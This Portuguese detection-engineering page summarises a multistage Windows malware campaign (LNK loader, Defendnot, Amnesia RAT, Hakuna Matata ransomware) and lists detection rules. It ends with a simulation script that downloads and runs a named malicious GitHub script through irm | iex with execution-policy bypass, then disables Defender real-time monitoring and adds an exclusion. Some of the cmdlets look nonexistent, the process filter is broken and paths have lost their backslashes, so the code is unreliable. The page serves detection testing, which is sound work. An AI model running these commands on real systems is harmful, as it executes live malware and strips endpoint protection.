Dentro de uma Operação de Malware Multiestágio no Windows
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O FortiGuard Labs identificou uma cadeia de intrusão em múltiplos estágios no Windows que começa com um arquivo LNK malicioso entregue dentro de um arquivo compactado. O atalho lança um carregador inicial do PowerShell que puxa scripts subsequentes do GitHub e depois passa o controle para um orquestrador de VBScript ofuscado. O fluxo de trabalho então tenta enfraquecer as defesas do endpoint desabilitando o Microsoft Defender, implantando a utilidade Defendnot e preparando tanto o Amnesia RAT como o ransomware Hakuna Matata. A operação é concluída com a entrega de um componente WinLocker que bloqueia a área de trabalho para interromper a recuperação e pressionar as vítimas.
Investigação
Investigadores reconstruíram o caminho de execução desde a etapa do PowerShell desencadeada pelo LNK até um VBScript que recompõe as cargas úteis na memória, culminando no lançamento do ransomware e no comportamento de bloqueio da área de trabalho. As medidas defensivas foram contornadas por meio de edições direcionadas no registro e pela injeção de um DLL Defendnot no Taskmgr.exe. A persistência foi implementada usando uma combinação de entradas de chave Run e artefatos na pasta de inicialização para reativar a cadeia após o login.
Mitigação
Monitore alterações suspeitas de políticas no nível do registro em HKLMSOFTWAREPoliciesMicrosoftWindows Defender e HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies. Bloqueie o egress para URLs maliciosos conhecidos do GitHub e Dropbox usados para preparação, e alerte sobre padrões de download e execução do PowerShell que se originam de lançamentos de LNK. Imponha a listagem de permissões de aplicações e aperte os controles de execução do PowerShell para reduzir o acesso inicial baseado em scripts.
Resposta
Se detectado, isole o endpoint, restaure as configurações do registro relacionadas ao Defender para um estado conhecido e bom, e remova arquivos maliciosos e entradas de persistência. Procure por processos ativos do Amnesia RAT e atividade de rede associada, e valide se a execução do ransomware ocorreu. Realize uma triagem forense completa para determinar o impacto e erradicar remanescentes, depois recupere sistemas de backups limpos quando viável.
Fluxo de Ataque
Detecções
Processo Suspeito Utiliza uma URL na Linha de Comando (via cmdline)
Ver
Desativar Monitoramento em Tempo Real do Windows Defender e Outras Alterações de Preferência (via cmdline)
Ver
IOCs (HashSha256) para detectar: Dentro de uma Campanha de Malware de Múltiplos Estágios no Windows
Ver
Atividade de Rede Maliciosa e C2 via GitHub, Dropbox, Telegram [Conexão de Rede do Windows]
Ver
Execução de Campanha de Malware no Windows PowerShell [PowerShell do Windows]
Ver
Execução do PowerShell e CMD com Isca Install.exe [Criação de Processo no Windows]
Ver
Execução de Simulação
Pré-requisito: A Verificação de Pré-voo de Telemetria e Linha de Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica de adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e têm como objetivo gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa do Ataque e Comandos:
Um adversário que obteve acesso inicial ao endpoint deseja baixar e executar uma carga maliciosa do PowerShell enquanto evita a política de execução padrão. Eles usamInvoke‑Expression(iex) combinado comInvoke‑WebRequest(irm) para puxar um script de uma URL remota bruta do GitHub, executando-o sob-ExecutionPolicy Bypass. Após estabelecer persistência, eles desativam o monitoramento em tempo real do Windows Defender para evitar a detecção de cargas subsequentes. Essas etapas geram diretamente as strings de linha de comando que a regra Sigma observa. -
Script de Teste de Regressão:
# -------------------------------------------------------------- # Passo 1 – Execute o script remoto com Bypass de ExecutionPolicy # -------------------------------------------------------------- $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1" powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex" # -------------------------------------------------------------- # Passo 2 – Desative o monitoramento em tempo real do Windows Defender # -------------------------------------------------------------- # Desative a proteção em tempo real Disable-MpPreference -DisableRealtimeMonitoring $true # Adicione um caminho de exclusão (simulado) Add-MpPreference -ExclusionPath "C:TempExcludeFolder" -
Comandos de Limpeza:
# Reative o monitoramento em tempo real do Windows Defender Enable-MpPreference -DisableRealtimeMonitoring $false # Remova o caminho de exclusão (se existir) Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue # Pare quaisquer processos do PowerShell remanescentes iniciados pelo script Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force